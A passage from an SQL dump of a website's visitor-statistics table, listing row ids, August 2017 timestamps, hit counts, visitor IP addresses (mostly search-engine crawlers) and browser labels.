),(147515,1503223652,1,1,0,0,'141.8.183.5','other'),(147516,1503223793,1,0,1,0,'68.180.228.221',''),(147517,1503223835,1,1,0,0,'51.255.65.42','other'),(147518,1503224126,1,1,0,0,'217.182.132.79','other'),(147519,1503224228,1,0,1,0,'66.249.66.74',''),(147520,1503224327,1,1,0,0,'8.29.198.25','other'),(147521,1503224578,1,1,0,0,'217.182.132.87','other'),(147522,1503224897,1,1,0,0,'51.255.65.20','other'),(147523,1503225208,1,1,0,0,'91.209.11.236','other'),(147524,1503225276,1,1,0,0,'51.255.65.82','other'),(147525,1503225755,1,1,0,0,'217.182.132.186','other'),(147526,1503225766,1,1,0,0,'180.76.15.156','other'),(147527,1503226383,1,1,0,0,'95.108.181.58','other'),(147528,1503227075,1,1,0,0,'91.209.11.236','other'),(147529,1503227389,1,1,0,0,'178.154.200.27','other'),(147530,1503227463,1,1,0,0,'66.102.9.27','chrome'),(147531,1503227674,1,1,0,0,'164.132.162.158','other'),(147532,1503227693,1,1,0,0,'51.255.65.12','other'),(147533,1503228178,9,9,0,0,'5.9.61.111','other'),(147534,1503228324,1,1,0,0,'95.108.181.69','other'),(147535,1503228348,1,1,0,0,'93.80.41.31','msie'),(147536,1503228511,1,1,0,0,'164.132.162.156','other'),(147537,1503228556,1,1,0,0,'178.154.200.7','other'),(147538,1503228863,2,2,0,0,'216.244.66.246','other'),(147539,1503229095,1,1,0,0,'37.9.113.94','other'),(147540,1503229155,1,1,0,0,'185.137.17.79','chrome'),(147541,1503229158,1,1,0,0,'91.209.11.236','other'),(147542,1503229480,1,1,0,0,'37.9.113.163','other'),(147543,1503230216,1,1,0,0,'66.249.66.157','chrome'),(147544,1503230391,1,1,0,0,'213.180.203.32','other'),(147545,1503230705,2,2,0,0,'91.209.11.236','other'),(147546,1503230963,2,2,0,0,'178.154.200.27','other'),(147547,1503231178,1,1,0,0,'217.182.132.149','other'),(147548,1503231247,1,1,0,0,'51.255.65.32','other'),(147549,1503231892,1,1,0,0,'141.8.183.1','other'),(147550,1503232042,1,1,0,0,'51.255.65.37','other'),(147551,1503232154,4,4,0,0,'91.209.11.236','other'),(147552,1503232704,6,6,0,0,'216.244.66.194','other'),(147553,1503232791,1,1,0,0,'188.231.214.125','chrome'),(147554,1503232924,1,1,0,0,'5.45.207.42','other'),(147555,1503233042,1,1,0,0,'51.255.65.93','other'),(147556,1503233221,1,1,0,0,'87.250.224.75','other'),(147557,1503233340,1,1,0,0,'51.255.65.14','other'),(147558,1503233394,1,0,1,0,'68.180.228.221',''),(147559,1503233750,1,1,0,0,'5.45.207.32','other'),(147560,1503233782,1,1,0,0,'137.74.207.108','other'),(147561,1503234405,1,1,0,0,'217.182.132.32','other'),(147562,1503234485,1,1,0,0,'51.255.65.23','other'),(147563,1503234504,1,1,0,0,'141.8.183.5','other'),(147564,1503234593,3,3,0,0,'216.244.66.246','other'),(147565,1503234920,1,1,0,0,'141.8.142.21','other'),(147566,1503235044,1,1,0,0,'164.132.162.157','other'),(147567,1503235104,1,0,1,0,'68.180.228.221',''),(147568,1503235165,1,1,0,0,'8.29.198.27','other'),(147569,1503235425,2,2,0,0,'141.8.142.45','other'),(147570,1503235840,1,1,0,0,'217.182.132.6','other'),(147571,1503235842,2,2,0,0,'51.255.65.28','other'),(147572,1503235923,1,1,0,0,'217.182.132.172','other'),(147573,1503236006,1,1,0,0,'107.178.195.220','msie'),(147574,1503236007,1,1,0,0,'204.13.201.137','msie'),(147575,1503236111,2,2,0,0,'216.244.66.246','other'),(147576,1503236133,1,1,0,0,'141.8.183.1','other'),(147577,1503236319,1,1,0,0,'178.62.99.175','msie'),(147578,1503236812,1,1,0,0,'137.74.201.99','other'),(147579,1503237141,1,1,0,0,'51.255.65.92','other'),(147580,1503237556,1,1,0,0,'150.70.173.10','msie'),(147581,1503238197,1,1,0,0,'217.182.132.63','other'),(147582,1503238663,1,1,0,0,'141.8.183.5','other'),(147583,1503238735,1,1,0,0,'51.255.65.79','other'),(147584,1503238795,1,1,0,0,'216.244.66.194','other'),(147585,1503238911,1,1,0,0,'141.8.142.21','other'),(147586,1503239250,1,1,0,0,'164.132.162.153','other'),(147587,1503239823,1,1,0,0,'217.182.132.74','other'),(147588,1503239894,1,1,0,0,'178.154.200.7','other'),(147589,1503239907,1,1,0,0,'51.255.65.77','other'),(147590,1503239913,1,1,0,0,'51.15.42.114','opera'),(147591,1503239918,2,2,0,0,'51.15.42.114','other'),(147592,1503240054,1,1,0,0,'51.15.42.114','msie'),(147593,1503240147,1,1,0,0,'5.45.207.32','other'),(147594,1503240192,1,1,0,0,'51.15.42.114','firefox'),(147595,1503240699,1,1,0,0,'217.182.132.5','other'),(147596,1503240954,1,1,0,0,'217.182.132.53','other'),(147597,1503241171,1,1,0,0,'217.182.132.97','other'),(147598,1503241172,1,1,0,0,'51.255.65.79','other'),(147599,1503241267,1,1,0,0,'37.9.113.94','other'),(147600,1503241289,1,1,0,0,'141.8.183.1','other'),(147601,1503241622,10,10,0,0,'69.58.178.58','other'),(147602,1503241685,1,1,0,0,'51.255.64.106','other'),(147603,1503242032,1,1,0,0,'217.182.132.190','other'),(147604,1503242091,9,9,0,0,'216.244.66.194','other'),(147605,1503242569,1,1,0,0,'51.255.65.84','other'),(147606,1503242582,1,1,0,0,'51.255.65.69','other'),(147607,1503243183,1,1,0,0,'157.55.39.229','other'),(147608,1503243296,2,2,0,0,'91.209.11.236','other'),(147609,1503243722,1,1,0,0,'178.154.200.7','other'),(147610,1503244024,5,5,0,0,'216.244.66.246','other'),(147611,1503244958,1,1,0,0,'37.9.113.163','other'),(147612,1503244961,1,1,0,0,'5.255.253.19','other'),(147613,1503245022,1,0,1,0,'66.249.66.74',''),(147614,1503245120,1,1,0,0,'180.76.15.34','other'),(147615,1503245273,1,1,0,0,'213.180.203.32','other'),(147616,1503245802,1,1,0,0,'137.74.207.101','other'),(147617,1503245807,1,1,0,0,'141.8.183.5','other'),(147618,1503245999,1,1,0,0,'8.29.198.25','other'),(147619,1503246105,2,2,0,0,'91.209.11.236','other'),(147620,1503246667,1,1,0,0,'178.154.200.7','other'),(147621,1503246840,3,3,0,0,'95.158.189.118','other'),(147622,1503246982,1,1,0,0,'217.182.132.66','other'),(147623,1503247079,1,1,0,0,'217.182.132.183','other'),(147624,1503247165,4,4,0,0,'216.244.66.246','other'),(147625,1503247224,1,1,0,0,'51.255.65.62','other'),(147626,1503247262,1,1,0,0,'217.182.132.92','other'),(147627,1503247337,1,1,0,0,'51.255.65.67','other'),(147628,1503248451,1,0,1,0,'68.180.228.221',''),(147629,1503248717,1,1,0,0,'40.77.167.29','other'),(147630,1503248814,1,1,0,0,'51.255.65.82','other'),(147631,1503249876,1,1,0,0,'51.255.65.22','other'),(147632,1503250149,1,1,0,0,'217.69.133.5','other'),(147633,1503250470,2,2,0,0,'91.209.11.236','other'),(147634,1503250719,1,1,0,0,'51.255.65.94','other'),(147635,1503251111,1,1,0,0,'46.161.9.39','chrome'),(147636,1503251303,1,1,0,0,'141.8.142.21','other'),(147637,1503251416,1,1,0,0,'37.9.113.163','other'),(147638,1503251612,1,1,0,0,'91.209.11.236','other'),(147639,1503251756,1,1,0,0,'217.182.132.155','other'),(147640,1503251812,1,1,0,0,'51.255.71.123','other'),(147641,1503251987,1,1,0,0,'217.182.132.57','other'),(147642,1503252049,9,9,0,0,'216.244.66.194','other'),(147643,1503252083,1,1,0,0,'178.95.247.145','chrome'),(147644,1503252950,1,1,0,0,'216.244.66.194','other'),(147645,1503253259,2,2,0,0,'91.209.11.236','other'),(147646,1503253270,1,1,0,0,'91.124.133.195','chrome'),(147647,1503253348,1,1,0,0,'51.255.65.28','other'),(147648,1503254077,1,1,0,0,'157.55.39.229','other'),(147649,1503254212,10,10,0,0,'216.244.66.246','other'),(147650,1503254503,1,1,0,0,'91.196.178.33','chrome'),(147651,1503254765,1,1,0,0,'137.74.201.108','other'),(147652,1503254937,1,0,1,0,'66.249.66.157',''),(147653,1503255081,1,1,0,0,'91.209.11.236','other'),(147654,1503255543,1,1,0,0,'51.255.65.5','other'),(147655,1503256832,1,1,0,0,'8.29.198.26','other'),(147656,1503256891,1,1,0,0,'91.209.11.236','other'),(147657,1503256929,1,1,0,0,'91.196.178.163','chrome'),(147658,1503257461,1,1,0,0,'217.182.132.15','other'),(147659,1503257854,1,1,0,0,'157.55.39.4','other'),(147660,1503257959,1,1,0,0,'217.182.132.16','other'),(147661,1503258983,1,1,0,0,'51.255.71.112','other'),(147662,1503258984,1,1,0,0,'142.4.200.37','other'),(147663,1503259869,1,1,0,0,'213.180.203.32','other'),(147664,1503259891,1,1,0,0,'128.72.177.9','msie'),(147665,1503259953,2,2,0,0,'216.244.66.246','other'),(147666,1503260260,1,1,0,0,'46.219.19.25','other'),(147667,1503260423,2,2,0,0,'91.209.11.236','other'),(147668,1503260577,1,1,0,0,'51.255.65.5','other'),(147669,1503262235,1,1,0,0,'217.182.132.174','other'),(147670,1503262461,1,1,0,0,'91.209.11.236','other'),(147671,1503262602,4,4,0,0,'216.244.66.194','other'),(147672,1503262828,1,1,0,0,'51.255.71.118','other'),(147673,1503263128,2,2,0,0,'216.244.66.246','other'),(147674,1503263528,1,1,0,0,'95.108.181.63','other'),(147675,1503263551,1,1,0,0,'137.74.207.170','other'),(147676,1503263908,1,0,1,0,'68.180.228.221',''),(147677,1503264121,1,1,0,0,'51.255.65.89','other'),(147678,1503264564,1,1,0,0,'217.182.132.78','other'),(147679,1503264769,1,1,0,0,'217.182.132.68','other'),(147680,1503264958,1,1,0,0,'91.209.11.236','other'),(147681,1503265037,1,1,0,0,'157.55.39.229','other'),(147682,1503265198,2,2,0,0,'216.244.66.246','other'),(147683,1503265297,1,0,1,0,'68.180.228.221',''),(147684,1503265524,1,1,0,0,'37.9.113.163','other'),(147685,1503265722,1,1,0,0,'51.255.65.39','other'),(147686,1503266025,1,1,0,0,'141.8.142.45','other'),(147687,1503266153,1,1,0,0,'51.255.65.24','other'),(147688,1503266343,1,0,1,0,'66.249.66.157',''),(147689,1503266364,1,1,0,0,'91.209.11.236','other'),(147690,1503266538,1,1,0,0,'217.182.132.25','other'),(147691,1503266546,1,1,0,0,'37.115.109.129','chrome'),(147692,1503266690,1,1,0,0,'178.154.200.7','other'),(147693,1503266718,1,1,0,0,'217.182.132.21','other'),(147694,1503266859,1,1,0,0,'217.182.132.60','other'),(147695,1503267111,1,1,0,0,'217.182.132.65','other'),(147696,1503267367,2,2,0,0,'91.209.11.236','other'),(147697,1503267372,1,1,0,0,'51.255.65.67','other'),(147698,1503267636,1,1,0,0,'51.255.65.92','other'),(147699,1503267660,1,1,0,0,'8.29.198.26','other'),(147700,1503267726,2,2,0,0,'217.96.189.216','msie'),(147701,1503268127,1,0,1,0,'66.249.66.156',''),(147702,1503268716,1,1,0,0,'51.255.65.35','other'),(147703,1503269166,1,1,0,0,'217.182.132.6','other'),(147704,1503269250,1,1,0,0,'91.209.11.236','other'),(147705,1503269588,1,1,0,0,'213.180.203.32','other'),(147706,1503270447,1,1,0,0,'217.182.132.94','other'),(147707,1503270608,1,1,0,0,'51.255.71.111','other'),(147708,1503270760,1,1,0,0,'157.55.39.229','other'),(147709,1503271122,1,1,0,0,'91.209.11.236','other'),(147710,1503271408,2,2,0,0,'216.244.66.246','other'),(147711,1503271672,2,2,0,0,'216.244.66.194','other'),(147712,1503272665,4,4,0,0,'216.244.66.194','other'),(147713,1503273164,1,1,0,0,'51.255.71.132','other'),(147714,1503273187,1,1,0,0,'51.255.65.16','other'),(147715,1503274448,1,1,0,0,'180.76.15.146','other'),(147716,1503275011,1,1,0,0,'217.182.132.76','other'),(147717,1503275210,2,2,0,0,'91.209.11.236','other'),(147718,1503275629,1,1,0,0,'141.8.183.5','other'),(147719,1503275795,1,1,0,0,'164.132.162.154','other'),(147720,1503275885,1,1,0,0,'37.115.205.72','chrome'),(147721,1503277114,1,0,1,0,'66.249.66.156',''),(147722,1503277258,1,1,0,0,'95.108.181.63','other'),(147723,1503277291,1,1,0,0,'91.209.11.236','other'),(147724,1503277621,1,1,0,0,'51.255.65.9','other'),(147725,1503277669,1,1,0,0,'157.55.39.4','other'),(147726,1503277688,1,1,0,0,'54.165.59.7','other'),(147727,1503277997,1,1,0,0,'217.182.132.154','other'),(147728,1503278123,1,1,0,0,'51.255.65.91','other'),(147729,1503278366,1,0,1,0,'66.249.66.156',''),(147730,1503278417,1,1,0,0,'51.255.65.16','other'),(147731,1503278481,1,1,0,0,'66.249.66.74','chrome'),(147732,1503278504,1,1,0,0,'8.29.198.26','other'),(147733,1503278878,1,1,0,0,'5.45.207.32','other'),(147734,1503279373,1,1,0,0,'51.255.65.6','other'),(147735,1503279571,1,1,0,0,'217.182.132.180','other'),(147736,1503280669,2,2,0,0,'216.244.66.246','other'),(147737,1503280679,1,1,0,0,'66.249.66.156','chrome'),(147738,1503280829,1,1,0,0,'141.8.183.1','other'),(147739,1503281097,1,1,0,0,'217.182.132.84','other'),(147740,1503281565,1,1,0,0,'51.255.65.15','other'),(147741,1503281920,6,6,0,0,'216.244.66.194','other'),(147742,1503282150,3,3,0,0,'216.244.66.246','other'),(147743,1503282396,1,1,0,0,'51.255.65.69','other'),(147744,1503282798,1,0,1,0,'66.249.66.156',''),(147745,1503283461,1,1,0,0,'217.182.132.184','other'),(147746,1503284142,1,1,0,0,'217.182.132.32','other'),(147747,1503285232,1,1,0,0,'137.74.207.102','other'),(147748,1503285416,1,1,0,0,'141.8.183.1','other'),(147749,1503285897,1,0,1,0,'66.249.66.76',''),(147750,1503285922,1,1,0,0,'217.182.132.66','other'),(147751,1503286175,1,1,0,0,'91.209.11.236','other'),(147752,1503286408,1,1,0,0,'217.182.132.29','other'),(147753,1503286467,1,1,0,0,'109.63.147.16','chrome'),(147754,1503286642,1,1,0,0,'51.255.65.30','other'),(147755,1503287271,1,1,0,0,'141.8.183.1','other'),(147756,1503287584,1,1,0,0,'40.77.167.44','other'),(147757,1503287832,1,1,0,0,'51.255.65.18','other'),(147758,1503287975,2,2,0,0,'91.209.11.236','other'),(147759,1503288074,1,1,0,0,'217.182.132.59','other'),(147760,1503288099,1,1,0,0,'51.255.65.36','other'),(147761,1503288161,1,1,0,0,'217.182.132.62','other'),(147762,1503288424,1,1,0,0,'51.255.65.64','other'),(147763,1503288610,1,1,0,0,'51.255.65.94','other'),(147764,1503288851,1,1,0,0,'130.180.217.18','chrome'),(147765,1503289341,1,1,0,0,'8.29.198.26','other'),(147766,1503289346,1,1,0,0,'141.8.142.21','other'),(147767,1503290003,1,1,0,0,'91.196.178.69','firefox'),(147768,1503290444,1,1,0,0,'216.244.66.194','other'),(147769,1503290515,1,1,0,0,'216.244.66.246','other'),(147770,1503291043,1,1,0,0,'91.209.11.236','other'),(147771,1503291236,1,1,0,0,'51.255.65.85','other'),(147772,1503291414,1,1,0,0,'37.229.44.129','chrome'),(147773,1503291483,2,2,0,0,'91.196.178.69','firefox'),(147774,1503291700,4,4,0,0,'216.244.66.246','other'),(147775,1503291774,1,1,0,0,'217.182.132.57','other'),(147776,1503292593,1,1,0,0,'141.8.183.1','other'),(147777,1503292614,2,2,0,0,'95.213.141.126','opera'),(147778,1503292897,1,1,0,0,'217.182.132.6','other'),(147779,1503293831,1,1,0,0,'217.182.132.153','other'),(147780,1503294654,1,1,0,0,'164.132.162.155','other'),(147781,1503294873,1,1,0,0,'91.196.178.65','chrome'),(147782,1503294945,1,1,0,0,'91.209.11.236','other'),(147783,1503295252,1,1,0,0,'91.237.107.19','chrome'),(147784,1503295620,1,1,0,0,'141.8.142.45','other'),(147785,1503295955,1,1,0,0,'217.182.132.170','other'),(147786,1503296355,1,1,0,0,'91.196.178.67','chrome'),(147787,1503296401,1,1,0,0,'51.255.65.25','other'),(147788,1503296466,1,1,0,0,'66.249.93.205','chrome'),(147789,1503296787,1,1,0,0,'91.196.178.70','chrome'),(147790,1503296888,1,1,0,0,'51.255.65.43','other'),(147791,1503296896,2,2,0,0,'91.209.11.236','other'),(147792,1503296942,1,1,0,0,'217.182.132.152','other'),(147793,1503297037,1,1,0,0,'51.255.65.36','other'),(147794,1503297859,1,1,0,0,'216.244.66.194','other'),(147795,1503297984,1,1,0,0,'94.178.115.218','firefox'),(147796,1503298055,1,1,0,0,'5.45.207.26','other'),(147797,1503298327,1,1,0,0,'137.74.201.100','other'),(147798,1503298458,1,1,0,0,'180.76.15.31','other'),(147799,1503298627,1,1,0,0,'217.182.132.174','other'),(147800,1503298779,1,1,0,0,'91.209.11.236','other'),(147801,1503298988,1,1,0,0,'92.113.63.205','chrome'),(147802,1503299069,1,1,0,0,'141.8.183.5','other'),(147803,1503299150,1,0,1,0,'66.249.66.157',''),(147804,1503299382,1,1,0,0,'51.255.65.24','other'),(147805,1503299839,1,1,0,0,'137.74.201.99','other'),(147806,1503299966,1,1,0,0,'178.95.249.106','chrome'),(147807,1503300175,1,1,0,0,'8.29.198.25','other'),(147808,1503300229,1,1,0,0,'91.196.178.37','chrome'),(147809,1503300442,1,1,0,0,'91.196.178.132','chrome'),(147810,1503300723,1,1,0,0,'216.244.66.246','other'),(147811,1503301093,1,1,0,0,'137.74.207.188','other'),(147812,1503301271,2,2,0,0,'216.244.66.194','other'),(147813,1503301436,1,1,0,0,'51.255.65.10','other'),(147814,1503301583,2,2,0,0,'91.209.11.236','other'),(147815,1503301598,1,1,0,0,'51.255.65.77','other'),(147816,1503302051,2,2,0,0,'91.196.178.71','chrome'),(147817,1503302054,1,1,0,0,'95.108.181.63','other'),(147818,1503303136,1,1,0,0,'217.182.132.186','other'),(147819,1503303457,1,1,0,0,'51.255.65.8','other'),(147820,1503303601,1,1,0,0,'37.9.113.163','other'),(147821,1503303856,1,1,0,0,'141.8.183.5','other'),(147822,1503303880,1,1,0,0,'91.209.11.236','other'),(147823,1503303900,1,1,0,0,'141.8.183.1','other'),(147824,1503303989,1,1,0,0,'51.255.65.47','other'),(147825,1503304326,1,1,0,0,'51.255.65.74','other'),(147826,1503304332,1,1,0,0,'51.255.71.131','other'),(147827,1503304597,1,1,0,0,'46.201.175.91','firefox'),(147828,1503304619,1,1,0,0,'217.69.133.194','other'),(147829,1503304904,1,1,0,0,'157.55.39.4','other'),(147830,1503305330,1,1,0,0,'51.255.71.132','other'),(147831,1503305618,1,1,0,0,'141.8.183.5','other'),(147832,1503305630,1,1,0,0,'91.209.11.236','other'),(147833,1503305638,2,0,2,0,'68.180.228.221',''),(147834,1503305714,1,1,0,0,'141.8.142.45','other'),(147835,1503306257,1,1,0,0,'51.255.65.14','other'),(147836,1503306852,1,1,0,0,'216.244.66.246','other'),(147837,1503307073,1,1,0,0,'91.209.11.236','other'),(147838,1503307455,1,1,0,0,'217.182.132.55','other'),(147839,1503307833,1,1,0,0,'217.182.132.37','other'),(147840,1503307990,1,0,1,0,'66.249.66.157',''),(147841,1503308201,1,1,0,0,'54.165.59.7','other'),(147842,1503308562,1,1,0,0,'137.74.207.188','other'),(147843,1503308652,1,1,0,0,'217.182.132.22','other'),(147844,1503308981,1,1,0,0,'217.182.132.83','other'),(147845,1503309046,1,1,0,0,'141.8.142.45','other'),(147846,1503309067,1,1,0,0,'31.43.24.227','chrome'),(147847,1503309129,1,1,0,0,'217.182.132.50','other'),(147848,1503309137,1,1,0,0,'217.182.132.175','other'),(147849,1503309185,3,3,0,0,'216.244.66.246','other'),(147850,1503309582,1,1,0,0,'217.182.132.74','other'),(147851,1503309768,1,1,0,0,'217.182.132.184','other'),(147852,1503310080,1,1,0,0,'217.182.132.62','other'),(147853,1503310124,1,1,0,0,'217.182.132.50','other'),(147854,1503310237,1,1,0,0,'95.108.181.69','other'),(147855,1503310376,1,1,0,0,'213.180.203.32','other'),(147856,1503310532,1,1,0,0,'37.9.113.163','other'),(147857,1503311010,1,1,0,0,'8.29.198.27','other'),(147858,1503311097,1,1,0,0,'51.255.65.40','other'),(147859,1503311374,1,1,0,0,'46.201.175.91','firefox'),(147860,1503311446,1,1,0,0,'91.209.11.236','other'),(147861,1503311622,1,1,0,0,'95.135.241.163','chrome'),(147862,1503311673,8,8,0,0,'216.244.66.194','other'),(147863,1503312008,1,1,0,0,'217.182.132.188','other'),(147864,1503312496,48,48,0,0,'144.76.38.40','other'),(147865,1503312687,1,1,0,0,'217.182.132.146','other'),(147866,1503312814,1,1,0,0,'91.209.11.236','other'),(147867,1503313262,1,1,0,0,'51.255.65.6','other'),(147868,1503313660,1,1,0,0,'51.255.71.127','other'),(147869,1503314629,1,1,0,0,'91.209.11.236','other'),(147870,1503315121,1,1,0,0,'217.182.132.90','other'),(147871,1503315509,1,1,0,0,'217.182.132.240','other'),(147872,1503315629,1,1,0,0,'94.244.16.108','chrome'),(147873,1503315676,1,1,0,0,'216.244.66.246','other'),(147874,1503315936,1,1,0,0,'91.196.178.166','chrome'),(147875,1503316165,2,2,0,0,'91.192.135.241','firefox'),(147876,1503316170,1,1,0,0,'217.182.132.177','other'),(147877,1503317024,1,1,0,0,'178.154.200.7','other'),(147878,1503318227,1,1,0,0,'66.102.9.29','chrome'),(147879,1503318260,1,1,0,0,'141.8.183.5','other'),(147880,1503318451,5,5,0,0,'216.244.66.246','other'),(147881,1503319116,1,1,0,0,'91.196.178.66','chrome'),(147882,1503319240,1,1,0,0,'217.182.132.97','other'),(147883,1503319569,1,0,1,0,'66.249.66.157',''),(147884,1503319834,1,1,0,0,'95.108.181.63','other'),(147885,1503320178,1,1,0,0,'217.182.132.177','other'),(147886,1503320226,1,0,1,0,'68.180.228.221',''),(147887,1503320610,1,1,0,0,'217.182.132.148','other'),(147888,1503320736,2,2,0,0,'91.196.178.69','firefox'),(147889,1503320820,10,10,0,0,'216.244.66.194','other'),(147890,1503321363,1,1,0,0,'5.45.207.64','other'),(147891,1503321624,1,0,1,0,'68.180.228.221',''),(147892,1503321845,1,1,0,0,'8.29.198.27','other'),(147893,1503322267,1,1,0,0,'217.182.132.20','other'),(147894,1503322346,1,1,0,0,'141.8.142.45','other'),(147895,1503322390,1,1,0,0,'51.255.71.117','other'),(147896,1503322597,1,1,0,0,'51.255.65.62','other'),(147897,1503322659,1,1,0,0,'108.59.8.70','other'),(147898,1503323096,1,1,0,0,'91.209.11.236','other'),(147899,1503323454,1,1,0,0,'37.9.113.163','other'),(147900,1503323457,1,1,0,0,'91.196.178.68','firefox'),(147901,1503323540,1,1,0,0,'217.182.132.68','other'),(147902,1503323652,1,0,1,0,'66.249.66.155',''),(147903,1503323963,1,1,0,0,'5.45.207.32','other'),(147904,1503324017,1,1,0,0,'217.182.132.60','other'),(147905,1503324281,1,1,0,0,'91.196.177.46','firefox'),(147906,1503324306,1,1,0,0,'66.249.66.156','chrome'),(147907,1503324320,1,1,0,0,'217.182.132.31','other'),(147908,1503324710,1,1,0,0,'51.255.65.26','other'),(147909,1503325359,1,1,0,0,'51.255.65.49','other'),(147910,1503325365,1,1,0,0,'91.209.11.236','other'),(147911,1503325445,1,1,0,0,'178.154.200.7','other'),(147912,1503325555,1,1,0,0,'95.108.181.63','other'),(147913,1503326306,1,1,0,0,'141.8.142.45','other'),(147914,1503326767,2,2,0,0,'91.209.11.236','other'),(147915,1503326781,1,1,0,0,'51.255.65.59','other'),(147916,1503326912,1,1,0,0,'5.45.207.26','other'),(147917,1503327058,1,1,0,0,'217.182.132.18','other'),(147918,1503327105,1,1,0,0,'80.91.167.32','firefox'),(147919,1503327410,1,1,0,0,'95.108.181.69','other'),(147920,1503327676,1,1,0,0,'5.45.207.64','other'),(147921,1503327808,1,1,0,0,'217.182.132.184','other'),(147922,1503327878,3,3,0,0,'216.244.66.246','other'),(147923,1503328081,6,6,0,0,'216.244.66.194','other'),(147924,1503328152,2,2,0,0,'178.154.200.27','other'),(147925,1503328181,1,1,0,0,'5.255.253.4','other'),(147926,1503328376,4,4,0,0,'173.212.247.211','other'),(147927,1503328654,1,1,0,0,'51.255.65.9','other'),(147928,1503328891,1,1,0,0,'91.209.11.236','other'),(147929,1503329124,4,4,0,0,'216.244.66.246','other'),(147930,1503329294,1,1,0,0,'51.255.65.60','other'),(147931,1503329571,1,1,0,0,'91.196.178.33','chrome'),(147932,1503329763,2,0,2,0,'68.180.228.221',''),(147933,1503329785,1,1,0,0,'51.255.65.11','other'),(147934,1503330400,1,1,0,0,'5.45.207.32','other'),(147935,1503331223,1,1,0,0,'51.255.65.89','other'),(147936,1503331383,1,1,0,0,'51.255.71.122','other'),(147937,1503331633,1,1,0,0,'157.55.39.229','other'),(147938,1503332602,1,0,1,0,'66.249.66.156',''),(147939,1503332673,1,1,0,0,'8.29.198.25','other'),(147940,1503332826,1,1,0,0,'213.180.203.32','other'),(147941,1503333159,1,1,0,0,'51.255.71.110','other'),(147942,1503333304,1,1,0,0,'91.209.11.236','other'),(147943,1503333308,1,1,0,0,'137.74.201.108','other'),(147944,1503334008,1,1,0,0,'51.255.65.49','other'),(147945,1503334295,1,1,0,0,'37.9.113.94','other'),(147946,1503334709,1,1,0,0,'51.255.65.3','other'),(147947,1503334711,1,1,0,0,'51.255.71.111','other'),(147948,1503335072,1,1,0,0,'213.180.203.32','other'),(147949,1503335076,1,1,0,0,'95.108.181.58','other'),(147950,1503335242,2,2,0,0,'91.196.178.33','chrome'),(147951,1503335308,1,1,0,0,'5.45.207.64','other'),(147952,1503335692,1,1,0,0,'37.9.113.180','other'),(147953,1503336028,1,1,0,0,'92.112.125.230','chrome'),(147954,1503336074,1,0,1,0,'68.180.228.221',''),(147955,1503336916,1,1,0,0,'37.9.113.78','other'),(147956,1503336925,1,1,0,0,'217.69.133.215','other'),(147957,1503336938,5,5,0,0,'216.244.66.246','other'),(147958,1503337752,1,0,1,0,'68.180.228.221',''),(147959,1503337758,1,1,0,0,'178.154.200.27','other'),(147960,1503338054,1,1,0,0,'141.8.183.5','other'),(147961,1503338117,2,2,0,0,'216.244.66.194','other'),(147962,1503338147,1,1,0,0,'213.180.203.32','other'),(147963,1503338235,1,1,0,0,'141.8.142.21','other'),(147964,1503338252,1,1,0,0,'91.196.178.166','chrome'),(147965,1503338493,2,2,0,0,'216.244.66.246','other'),(147966,1503339096,1,1,0,0,'5.45.207.32','other'),(147967,1503339513,1,0,1,0,'68.180.228.221',''),(147968,1503339640,1,1,0,0,'37.9.113.163','other'),(147969,1503339872,1,1,0,0,'87.250.224.54','other'),(147970,1503340029,1,1,0,0,'91.209.11.236','other'),(147971,1503340056,1,1,0,0,'107.167.105.150','other'),(147972,1503340223,2,2,0,0,'178.154.200.7','other'),(147973,1503340339,1,1,0,0,'94.179.208.65','chrome'),(147974,1503340602,1,1,0,0,'128.72.15.115','msie'),(147975,1503340687,4,4,0,0,'216.244.66.194','other'),(147976,1503341047,1,1,0,0,'213.180.203.32','other'),(147977,1503341217,1,1,0,0,'5.45.207.64','other'),(147978,1503341419,1,1,0,0,'178.154.200.7','other'),(147979,1503341437,1,1,0,0,'141.8.183.1','other'),(147980,1503341597,1,1,0,0,'37.9.113.163','other'),(147981,1503341635,1,1,0,0,'46.211.97.161','other'),(147982,1503341677,1,1,0,0,'141.8.142.21','other'),(147983,1503342002,1,1,0,0,'46.175.147.103','chrome'),(147984,1503342696,1,1,0,0,'95.108.181.69','other'),(147985,1503343333,1,1,0,0,'141.8.142.21','other'),(147986,1503343510,1,1,0,0,'8.29.198.25','other'),(147987,1503343835,1,1,0,0,'213.180.203.32','other'),(147988,1503343993,1,1,0,0,'217.182.132.157','other'),(147989,1503344362,2,2,0,0,'216.244.66.194','other'),(147990,1503344390,1,1,0,0,'217.182.132.20','other'),(147991,1503344455,1,1,0,0,'141.8.142.107','other'),(147992,1503344464,1,1,0,0,'217.182.132.182','other'),(147993,1503344877,1,1,0,0,'217.182.132.85','other'),(147994,1503345254,1,1,0,0,'5.45.207.32','other'),(147995,1503345321,1,1,0,0,'77.52.183.242','other'),(147996,1503345864,1,1,0,0,'91.196.178.70','chrome'),(147997,1503345954,1,1,0,0,'217.182.132.174','other'),(147998,1503346494,5,5,0,0,'216.244.66.246','other'),(147999,1503346547,1,1,0,0,'217.182.132.88','other'),(148000,1503346635,1,1,0,0,'141.8.142.107','other'),(148001,1503347315,1,1,0,0,'95.108.181.69','other'),(148002,1503347468,1,1,0,0,'141.8.183.1','other'),(148003,1503348000,2,2,0,0,'40.77.167.44','other'),(148004,1503348405,1,1,0,0,'164.132.164.180','other'),(148005,1503348543,1,1,0,0,'37.9.113.163','other'),(148006,1503348623,1,0,1,0,'66.249.66.74',''),(148007,1503349111,2,2,0,0,'198.245.49.215','other'),(148008,1503349446,1,1,0,0,'213.180.203.32','other'),(148009,1503349564,1,1,0,0,'51.255.65.70','other'),(148010,1503349691,12,12,0,0,'216.244.66.194','other'),(148011,1503349775,1,1,0,0,'217.182.132.97','other'),(148012,1503350239,1,1,0,0,'5.45.207.64','other'),(148013,1503350287,1,1,0,0,'51.255.71.128','other'),(148014,1503350516,1,1,0,0,'217.182.132.77','other'),(148015,1503350521,1,1,0,0,'51.255.65.86','other'),(148016,1503351397,1,1,0,0,'217.182.132.30','other'),(148017,1503351850,1,1,0,0,'141.8.183.1','other'),(148018,1503351885,1,1,0,0,'95.108.181.69','other'),(148019,1503352093,1,1,0,0,'141.8.183.5','other'),(148020,1503353016,1,1,0,0,'157.55.39.4','other'),(148021,1503353078,1,1,0,0,'217.182.132.88','other'),(148022,1503353166,1,1,0,0,'216.244.66.246','other'),(148023,1503353471,1,1,0,0,'51.255.65.84','other'),(148024,1503353478,1,1,0,0,'51.255.65.47','other'),(148025,1503353796,1,1,0,0,'51.255.71.100','other'),(148026,1503354112,1,1,0,0,'95.108.181.63','other'),(148027,1503354231,1,0,1,0,'68.180.228.221',''),(148028,1503354338,1,1,0,0,'8.29.198.26','other'),(148029,1503354694,